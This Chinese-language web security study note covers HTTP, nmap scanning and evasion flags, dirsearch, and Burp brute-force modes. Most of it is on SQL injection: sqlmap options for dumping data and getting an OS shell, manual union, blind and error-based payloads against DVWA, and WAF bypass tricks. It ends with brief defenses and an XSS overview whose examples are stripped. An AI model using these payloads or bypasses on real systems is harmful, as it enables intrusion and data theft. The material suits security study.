web 安全总结

1、web安全总结

1.1 web安全简介

1.1.1 http协议

http 协议是超文本传输协议-明文传输

https 协议是http协议的基础上进行升级，是数据在传输过程中进行加密

1.1.2 http请求

http请求分为：请求方法、请求头、请求体

GET、PUT、POST、OPTIONS、move、DELETE、head

1、请求方法

请求的第一行是“方法  URI  协议/版本”

例如：GET /sample.jsp HTTP/1.1

 GET    代表请求方法，

/sample.jsp  表示URI，

HTTP/1.1      代表协议和协议的版本。

2、请求头(Request Header)

请求头包含许多有关的客户端环境和请求正文的有用信息。例如，请求头可以声明浏览器所用的语言，请求正文的长度等。例如：

Accept:image/gif.image/jpeg.*/*

Accept-Language:zh-cn

Connection:Keep-Alive

Host:localhost

User-Agent:Mozila/4.0(compatible:MSIE5.01:Windows NT5.0)

Accept-Encoding:gzip,deflate.

3、请求正文

请求头和请求正文之间是一个空行，这个行非常重要，它表示请求头已经结束，接下来的是请求正文。请求正文中可以包含客户提交的查询字符串信息：

username=lichaokai&password=666666

1.2 信息探测

1.2.1 Nmap

nmap是一个免费开放的网络扫描和嗅探的工具包,也叫网络映射器。

功能：

1、探测一组主机是否在线

2、扫描主机端口,嗅探所提供的网络服务.

3、推断出主机所用的操作系统

参数：

1. nmap -sT 192.168.96.4 //TCP连接扫描，不安全，慢

2. nmap -sS 192.168.96.4 //SYN扫描,使用最频繁，安全，快

3. nmap -Pn 192.168.96.4  //目标机禁用ping，绕过ping扫描

4. nmap -sU 192.168.96.4 //UDP扫描,慢,可得到有价值的服务器程序

5. nmap -sI 僵尸ip 目标ip  //使用僵尸机对目标机发送数据包

6. nmap -sA 192.168.96.4  //检测哪些端口被屏蔽

7. nmap 192.168.96.4 -p   //对指定端口扫描

8. nmap 192.168.96.1/24 //对整个网段的主机进行扫描

9. nmap 192.168.96.4 -oX myscan.xml //对扫描结果另存在myscan.xml

10. nmap -T1~6 192.168.96.4 //设置扫描速度，一般T4足够。

11. nmap -sV 192.168.96.4  //对端口上的服务程序版本进行扫描

12. nmap -O 192.168.96.4  //对目标主机的操作系统进行扫描

13. nmap -sC 192.168.96.4  //使用脚本进行扫描，耗时长

14. nmap -A 192.168.96.4  //强力扫描，耗时长

15. nmap -6 ipv6地址   //对ipv6地址的主机进行扫描

16. nmap -f 192.168.96.4  //使用小数据包发送，避免被识别出

17. nmap –mtu 192.168.96.4 //发送的包大小,最大传输单元必须是8的整数

18. nmap -D <假ip> 192.168.96.4 //发送参杂着假ip的数据包检测

19. nmap --source-port //针对防火墙只允许的源端口

20. nmap –data-length: 192.168.96.4 //改变发生数据包的默认的长度，避免被识别出来是nmap发送的。

21. nmap -v 192.168.96.4  //显示冗余信息(扫描细节)

22. nmap -sn 192.168.96.4  //对目标进行ping检测，不进行端口扫描（会发送四种报文确定目标是否存活,）

23. nmap -sP 192.168.96.4  //仅仅对目标进行ping检测。

24. nmap -n/-p 192.168.96.4 //-n表示不进行dns解析，-p表示要

25. nmap --system-dns 192.168.96.4 //扫描指定系统的dns服务器

26. nmap –traceroute 192.168.96.4  //追踪每个路由节点。

27. nmap -PE/PP/PM: 使用ICMP echo, timestamp,and netmask 请求包发现主机。

28. nmap -sP 192.168.96.4      //主机存活性扫描，arp直连方式。

29. nmap -iR [number]       //对随机生成number个地址进行扫描。

1.2.2 dirsearch

Dirsearch为kali工具，用来对网站url路径进行探测扫描，常见的还有dirbuster、御剑等图形化工具。

1、Dirsearch的使用

2、扫描目标

-u,--url                    目标url

-l,--url-list=FILE          目标url文件路径

--stdin                     从标准输入中指定url

--cidr                      目标网段

--raw=File                  从文件中读取request报文,通过-schema指定策略

3、扫描的字典类型

-e,--extensions             包含的文件拓展名(逗号分隔) 如-e php,asp 

-X,--exclude-extensions     排除的文件拓展名(逗号分隔) 如-X asp,jsp

-f,--force-extensions       在字典的每条记录后面添加文件拓展名

4、字典格式设置

-w,--wordlists              自定义wordlist(以逗号分隔)

--prefixes                  添加自定义前缀

--suffixes                             添加自定义后缀

--only-selected              筛选出指定的文件拓展名或无文件拓展名的目录

--remove-extensions            移除所有wordlist的后缀名 (admin.php --> admin)

-U, --uppercase                 将字典转换为大写

-L, --lowercase                      将字典转换为小写

-C, --capital                  第一个字母大写剩下字母小写

5、响应结果的过滤

-i                    保留的响应状态码(以逗号分隔,支持指定范围) 如(-i 200,300-399)

-x                   排除的响应状态码(以逗号分隔,支持指定范围)  如(-x 301,500-599)

--exclude-sizes             通过大小排除(以逗号分隔) 如(123B,4KB)

--exclude-texts                 通过文本内容排除响应('Notfound', 'Error')

--exclude-regexps                   通过正则匹配排除响应('Not foun[a-z]{1}', '^Error$')

--exclude-redirects               通过正则跳转目标排除响应

--minimal                                 最小响应报文长度

--maximal                                最大响应报文长度

6、请求相关设置

-m,--http-method              HTTP请求方法 默认为GET

-d,--data                         HTTP请求数据

-H,--header                             请求头 如(-H 'Referer: example.com' -H 'Accept: */*')

--header-list=FILE             从文件中读取请求头

-F,--follow-redirects       跟随HTTP跳转

--user-agent                        设置user-agent字段

--cookie                                 设置cookie

7、连接相关设置

--timeout=TIMEOUT              连接超时时间

--ip=IP                                   服务器ip地址

-s DELAY, --delay=DELAY     每次请求间隔的时间

--proxy=PROXY                      代理url支持HTTP和SOCKS代理 如(localhost:8080, socks5://localhost:8088)

--proxy-list=FILE            包含代理服务器的地址

--matches-proxy=PROXY      Proxy to replay with found paths

--scheme                                默认的策略 用于从文件中导入请求或url中不包含协议

--max-retries                         最大重连次数

-b,--request-by-hostname       强制通过域名连接，(默认为了速度,使用ip连接)

--exit-on-error                    出现错误时退出

--debug                                 Debug模式

8、通用设置

--version                          显示dirsearch的版本

-h --help                         帮助提示

-r,--recursive             递归爆破

-R,--recursion-depth        最大递归的层数

-t,--threads                 线程数

--subdirs                  扫描子目录 如(admin/ 则www.example.com/admin/+字典)

--exclude-subdirs                  在递归扫描中排除的子目录

-q,--quiet-mode             安静模式

--full-url                  打印出完整的url

--no-color                  无颜色输出信息

9、输出模式

--simple-report=OUTPUTFILE

--plain-text-report=OUTPUTFILE

--json-report=OUTPUTFILE

--xml-report=OUTPUTFILE

--markdown-report=OUTPUTFILE

--csv-report=OUTPUTFILE

10、Dirbuster的使用

1.3 漏洞扫描

1.3.1 Burp Suit 的使用

1、常用的功能模块

Proxy: 代理

Intruder: 爆破

Repeder: 流量包的重放

Decoder: 编码解码

Comparer: 流量包对比

Extender: 插件

User options: 用户配置

2、爆破的四种模式

2.1 Sniper(狙击手)

作为比较常用的模式，Sniper的作用是对其中选定的参数一个一个依次遍历字典并且替换然后测试。

2.2 Battering ram(攻城锤)

不同于sniper，Batteringram是两个参数同时进行遍历一个字典的。

2.3 Pitchfork(音叉模式)

Pitchfork作为多字典，他的特点也非常明显，就是多个字典同时进行，与Battering ram有些相似之处，但是一个是多个人跑一个赛道，而一个是多个人，各有各的赛道。

2.4Cluster bomb(集束炸弹)(推荐爆破时使用)

Cluster bomb兼备了前面三种模式的所有的功能，那就是全部遍历，不放过所有情况，但是在超大字典的情况下，运算能力就限制了Cluster bomb模式的发挥，所以只要算力足够，那爆破出密码就不是问题。

1.3.2 AWVS

AWVS针对web应用系统进行漏洞扫描，可以单个url进行测试扫描和文件导入多行数据进行漏洞扫描。

1.3.3 nessus

Nessus对主机进行漏洞扫描，记得安装并更新插件。

1.4  SQL注入

1、SQL注入的原理

对用户提交的数据没有任何过滤和校验，提交到数据库进行解析并执行。

2、注入位置

get、post、update、cookie、http header、referer

3、注入方法

union select联合查询、报错注入、布尔注入、延时注入、二次注入

4、常见的数据库

Mysql、oracle、access、sqlserver、prostgreSQL、MongoDB、Redis

5、sqlmap

参数：

--dbs    跑所有的数据库

-D DVWA --tables  查看所有表

-D DVWA -T users --dump   脱裤 dump 数据  

 --dump-all 所有数据

-r 指定数据包文件进行测试

--random-agent  随机agent   --user-agent 指定agents

--proxy="127.0.0.1:8080" 指定一个代理

--delay=3  频繁发包请求可能会触发服务器阈值或waf  延迟3秒请求 ids ips

--dbms=MySQL  指定测试mysql数据库payload

--tamper=  使用sqlmap自带tamper脚本来混淆payload通常用来绕waf和ips

--level=LEVEL 设置测试的等级（1-5，默认为1）lv2：cookie; lv3：user-agent，refere; lv5：host 在sqlmap/xml/payloads文件内可以看见各个level发送的payload

--risk=RISK 风险（1-4，默认1）升高风险等级会增加数据被篡改的风险。risk 2：基于事件的测试;risk 3：or语句的测试;risk4：update的测试

U --is-dba 是否是dba权限

--technique=B 指定所测试的类型（B:布尔盲注;E:报错注入;U:联合查询注入;S:文件系统，操作系统，注册表相关注入;T:时间盲注; 默认全部使用

--current-user  测试当前数据库的用户名

--users  查询共有哪些用户

--passwords 查询用户密码

--os-cmd=whoami 执行系统命令

--os-shell 系统交互shell

--file-read="/etc/password"

--file-write #写入本地文件(–file-write/test/test.txt –file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)

-p 指定参数

6、手工注入

6.1 测试流程

1、 寻找注入点（使用单引号或者双引号）

2、 判断注入类型（字符型or数字型）

   1'

   1 and 1=1 #

   1 and 1=2 #

   1' and 1=1 #

   1' and 1=2 #

   1' or '1' = '1 #

   1' or '1' = '2 #

3、 order by 查找显位（适用于联合查询）

4、暴库、报表、爆字段

6.2 联合查询

1' union select version()

判断列数

1' order by 1 -- -   --+   #

判断显位 

1' union select 1,2 -- -

查询数据

1' union select 1,(select database()) -- -

查数据库

基本语句：

1' UNION SELECT 1,database() from information_schema.schemata#

查询表名

1' UNION SELECT 1,table_name from information_schema.tables wheretable_schema='dvwa'#

1' UNION SELECT 1,table_name from information_schema.tables wheretable_schema='dvwa'#

查询字段

1' UNION SELECT 1,column_name from information_schema.columns wheretable_schema='dvwa' and table_name='users'#

查询列

1' UNION SELECT 1,group_concat(password,0x3a,user) from users#

6.2 盲注

ASCill表对应的值，键盘上的字符对应ASCill 表中的33-126位

判断数据库长度

1' and length(database())>10 #          //missing

1' and length(database())>5 #           //missing

1' and length(database())>3 #          //exists

1' and length(database())=4 #        //exists

burp跑出库名长度为4

跑库名

1' and ascii(substr(database(),1,1))=50 #  

 跑出库名是    dvwa

猜解表的数量

1' and (select count(table_name) from information_schema.tableswhere table_schema=database()) >10#

1' and (select count(table_name) from information_schema.tableswhere table_schema=database()) =2#

猜解每个表的长度

1' and length(substr((select table_name frominformation_schema.tables where table_schema=database() limit 0,1),1))=10 #

第一个表的长度是9

第二个表的长度是5

猜解第一个表名

1' and ascii(substr((select table_name frominformation_schema.tables where table_schema=database() limit 0,1),1,1))=88 #

guestbook

猜解第二个表名

1' and ascii(substr((select table_name frominformation_schema.tables where table_schema=database() limit 0,1),1,1))=88 #

users

爆users表里的列数

1' and (select count(column_name) from information_schema.columnswhere table_schema=database() and table_name='users')=8 #

users表里有8个列

爆users表的字段长度

1' and length(substr((select column_name frominformation_schema.columns where table_name= 'users' limit 0,1),1))=7 #

users表中第一个字段长度为7

爆users表中第一个列名称

1' and ascii(substr((select column_name frominformation_schema.columns where table_schema=database() and table_name='users'limit 0,1),1,1))=88 #

user_id

爆users表中第二个列名称

1' and ascii(substr((select column_name frominformation_schema.columns where table_schema=database() and table_name='users'limit 1,1),1,1))=88 #

first_name

爆users表中first_name列的行数

1' and length(substr((select user from users limit 0,1),1))=5#

first_name列有5行数据

爆users表中first_name列中每条信息的长度

1' and length(substr((select first_name from users limit 1,1),1))=1#

爆users表中first_name列中每条信息

1' and ascii(substr((select first_name from users limit1,1),1,1))=1#

6.3 报错注入

爆库名

1' and extractvalue(1,concat(0x7e,database()));#

爆表数

1' and extractvalue(1,concat(0x7e,(select count(table_name) frominformation_schema.tables where table_schema='dvwa')))#

爆表名

1' and extractvalue(1,concat(0x7e,(select table_name  from information_schema.tables wheretable_schema='dvwa' limit 0,1)))#

1' and extractvalue(1,concat(0x7e,(select table_name  from information_schema.tables wheretable_schema='dvwa' limit 1,1)))#

爆列数

1' and extractvalue(1,concat(0x7e,(select count(column_name) frominformation_schema.columns where table_schema='dvwa' and table_name='users')))#

爆列名

1' and extractvalue(1,concat(0x7e,(select column_name  from information_schema.columns wheretable_schema='dvwa' and table_name='users' limit 0,1)))#

爆列里信息

1' and extractvalue(1,concat(0x7e,(select user from users limit0,1)));#

7、常见的绕过方式

7.1 绕过空格（注释符/* */，%a0）：

两个空格代替一个空格，用Tab代替空格，%a0=空格：

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

 最基本的绕过方法，用注释替换空格：

/*  注释 */

使用浮点数：

select * from users where id=8E0union select 1,2,3

select * from users where id=8.0 select 1,2,3

7.2 括号绕过空格：

如果空格被过滤，括号没有被过滤，可以用括号绕过。

在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。

例如：

select(user())from dual where(1=1)and(2=2)

这种过滤方法常常用于time based盲注,例如：

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

（from for属于逗号绕过下面会有）

　　上面的方法既没有逗号也没有空格。猜解database（）第一个字符ascii码是否为109，若是则加载延时。

7.3 引号绕过（使用十六进制）：

会使用到引号的地方一般是在最后的where子句中。如下面的一条sql语句，这条语句就是一个简单的用来查选得到users表中所有字段的一条语句：

select column_name  from information_schema.tables where table_name="users"

这个时候如果引号被过滤了，那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。

　　users的十六进制的字符串是7573657273。那么最后的sql语句就变为了：

select column_name  from information_schema.tables where table_name=0x7573657273

7.4 逗号绕过（使用from或者offset）：

在使用盲注的时候，需要使用到substr(),mid(),limit()。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：

select substr(database() from 1 for 1);

select mid(database() from 1 for 1);

使用join：

union select 1,2     #等价于

union select * from (select 1)a join (select 2)b

　　使用like：

select ascii(mid(user(),1,1))=80   #等价于

select user() like 'r%'

　　对于limit可以使用offset来绕过：

select * from news limit 0,1

# 等价于下面这条SQL语句

select * from news limit 1 offset 0

7.5 比较符号（<>）绕过（过滤了<>：sqlmap盲注经常使用<>，使用between的脚本）：

使用greatest()、least（）：（前者返回最大值，后者返回最小值）

同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。

最常见的一个盲注的sql语句：

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,...)函数返回输入参数(n1,n2,n3,...)的最大值。

那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and：

between a and b：

between 1 and 1; 等价于 =1

7.6 or and xor not绕过：

and=&&  or=||   xor=|   not=!

7.7 绕过注释符号（#，--(后面跟一个空格））过滤：

id=1' union select 1,2,3||'1

　　最后的or '1闭合查询语句的最后的单引号，或者：

id=1' union select 1,2,'3

7.8 =绕过：

使用like 、rlike 、regexp 或者 使用< 或者 >

7.9 绕过union，select，where等：

1）使用注释符绕过：

　　常用注释符：

//，-- , /**/, #, --+, -- -, ;,%00,--a

　　用法：

U/**/ NION /**/ SE/**/ LECT /**/user，pwd from user

（2）使用大小写绕过：

id=-1'UnIoN/**/SeLeCT

（3）内联注释绕过：

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

（4） 双关键字绕过（若删除掉第一个匹配的union就能绕过）：

id=-1'UNIunionONSeLselectECT1,2,3–-

7.10 通用绕过（编码）：

　　如URLEncode编码，ASCII,HEX,unicode编码绕过：

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

7.11 等价函数绕过：

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()、substr() ==> substring()

@@user ==> user()

@@datadir ==> datadir()

举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　

或者：

substr((select 'password'),1,1) = 0x70

strcmp(left('password',1), 0x69) = 1

strcmp(left('password',1), 0x70) = 0

strcmp(left('password',1), 0x71) = -1

12.宽字节注入：

　　过滤 ' 的时候往往利用的思路是将 ' 转换为 \' 。

　　在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：

　　（1）%df 吃掉 \ 具体的方法是 urlencode(\') = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（'）符号在外面：

id=-1%df%5c%27union select 1,user(),3--+

　　（2）将 \' 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。

一般产生宽字节注入的PHP函数：

   1.replace（）：过滤 ' \ ，将 ' 转化为 \' ，将 \  转为 \\，将 " 转为 \" 。用思路一。

   2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：' , " , \ 。用思路一

（防御此漏洞，要将 mysql_query 设置为 binary 的方式）

　3.mysql_real_escape_string()：转义下列字符：

\x00     \n     \r     \     '     "     \x1a

（防御，将mysql设置为gbk即可）

PCRE绕过：

union/*'+'a'*1000001+'*/select

8、sql注入的防御

1、使用参数化查询或预编译语句：

将用户输入作为参数传递给查询，而不是直接拼接到查询字符串中，这样可以将参数值和SQL语句分开处理，使得参数值不会被当作代码的一部分进行解释执行以提高应用程序的安全性。

2、输入验证和过滤

输入验证和过滤是一种用于确保用户输入数据的安全性和有效性的技术。它可以防止恶意输入和错误数据导致的安全漏洞和应用程序错误。

3、最小权限原则

最小权限原则是一种安全性原则，指的是为了保护敏感数据和系统资源，用户应该被授予最小必需的权限。

4、使用防火墙和入侵检测系统

使用防火墙和入侵检测系统是为了保护计算机网络免受未经授权的访问和恶意攻击。

5、定期更新和维护数据库软件

定期更新和维护数据库软件是非常重要的，以确保数据库的安全性、性能和功能的稳定性。

6、输入数据编码

对于用户输入的数据，在存储到数据库之前，需要对其进行合适的编码，以防止恶意的SQL代码被执行。可以使用转义字符、编码函数等方式实现。

1.5 XSS漏洞

XSS 即（Cross Site Scripting）中文名称为：跨站脚本攻击

1、XSS 的原理

恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候，那么嵌入到web页面中script代码会执行，因此会达到恶意攻击用户的目的。

2、XSS的类型

2.1、存储型

主要是将恶意代码上传或存储到服务器中，下次只要受害者浏览包含此恶意代码的页面就会执行恶意代码。

攻击步骤：

1、攻击者将恶意代码提交到目标网站数据库中。

2、用户打开目标网站时，网站服务器将恶意代码从数据库中取出，然后拼接到html中返回给浏览器中。

3、用户浏览器接收到响应后解析执行，其中的恶意代码也会被执行。

4、恶意代码执行后，就能获取到用户数据，比如上面的cookie等信息，那么把该cookie发送到攻击者网站中，那么攻击者拿到该cookie然后会冒充该用户的行为，调用目标网站接口等违法操作。

2.2、反射型

反射性xss一般指攻击者通过特定的方式来诱惑受害者去访问一个包含恶意代码的URL。当受害者点击恶意链接url的时候，恶意代码会直接在受害者的主机上的浏览器执行。

攻击步骤：

1、攻击者在url后面的参数中加入恶意攻击代码。

2、当用户打开带有恶意代码的URL的时候，网站服务端将恶意代码从URL中取出，拼接在html中并且返回给浏览器端。

3、用户浏览器接收到响应后执行解析，其中的恶意代码也会被执行到。

4、攻击者通过恶意代码来窃取到用户数据并发送到攻击者的网站。攻击者会获取到比如cookie等信息，然后使用该信息来冒充合法用户的行为，调用目标网站接口执行攻击等操作。

2.3、Dom型

DOM-basedXSS漏洞是基于文档对象模型（Document ObjectModel)的一种漏洞。这种XSS与反射型XSS、持久型XSS在原理上有本质区别，它的攻击代码并不需要服务器解析响应，触发XSS靠的是浏览器端的DOM解析。客户端上的JavaScript脚本可以访问浏览器的DOM并修改页面的内容，不依赖服务器的数据，直接从浏览器端获取数据并执行。在客户端直接输出DOM内容的时候极易触发DOM型XSS漏洞，如document.getElementByld(“x’).innerHTML、document.write)等。

3、XSS常用触发标签

1、img

2、a

test

xss

xss

xss

xss

3、iframe

test

4、audio

5、video

6、svg

7、button

xss

xss

xss

xss

xss

8、div

这个需要借助url编码来实现绕过

原代码：

DIV